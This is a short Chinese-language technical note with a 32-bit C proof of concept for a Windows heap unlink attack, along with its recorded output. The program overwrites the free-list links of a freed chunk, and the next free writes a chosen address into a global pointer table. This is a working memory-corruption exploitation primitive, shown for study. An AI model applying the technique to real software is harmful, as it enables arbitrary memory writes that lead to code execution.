Windows heap unlink

代码实例

32位程序:

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Global pointer table (16 slots, only ptr[0..5] are used). main() stores the
// heap allocations here and later writes the table's own addresses into a
// freed chunk, which is why the table lives at file scope.
char* ptr[0x10];

// Demonstration of a free-list unlink on a private Windows heap (32-bit build).
// Nothing below checks return values; the demo relies on every call succeeding.
int main()
{
    // Private heap, 0x2000 bytes initial and maximum, with locking disabled
    // (HEAP_NO_SERIALIZE). A NULL handle is not checked for; the heap is also
    // never destroyed, which is acceptable only because the process exits at once.
    HANDLE heap = HeapCreate(HEAP_NO_SERIALIZE, 0x2000, 0x2000);
    // Unbuffered stdout so the first printf is visible even if the process
    // dies inside the final HeapFree.
    setbuf(stdout, NULL);
    // Six allocations of 0x18 bytes each; results are not NULL-checked.
    ptr[0] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[1] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[2] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[3] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[4] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[5] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    // After these two frees ptr[2] and ptr[4] are dangling; ptr[2] is still
    // dereferenced below.
    HeapFree(heap, HEAP_NO_SERIALIZE, ptr[2]);
    HeapFree(heap, HEAP_NO_SERIALIZE, ptr[4]);
    // Write-after-free: the first two pointer-sized slots of the freed ptr[2]
    // chunk are overwritten with &ptr[1] (that is what &ptr[2] - 1 evaluates to
    // on a char** ) and &ptr[2]. The demo's premise (see the title) is that these
    // slots hold the freed chunk's free-list links; that layout is not
    // verifiable from this listing.
    *(void**)(ptr[2]) = &ptr[2] - 1;
    *(void**)(ptr[2] + 4) = &ptr[2];
    // Before the unlink: ptr[2] still holds its original heap address.
    printf("%p: %p\n", &ptr[2], ptr[2]);
    // Freeing the neighbour of the corrupted chunk. Per the recorded output
    // below, ptr[2] afterwards equals &ptr[2], i.e. the free wrote into the
    // global table. A safe-unlink check (both links must point back at the
    // entry before it is unlinked) is the standard mitigation for this kind of
    // write; whether such a check applies to this path cannot be determined
    // from the listing.
    HeapFree(heap, HEAP_NO_SERIALIZE, ptr[1]);
    // After the unlink.
    printf("%p: %p\n", &ptr[2], ptr[2]);
    return 0;
}

运行结果:

003B9508: 019604D8
003B9508: 003B9508

简述条件:

  • 除了 free 掉目标堆块以外,还需要额外 free 掉一个堆块。

与 Linux 的 unlink 差异较大。

结果:

ptr[2] 最终指向了目标地址(&ptr[2])。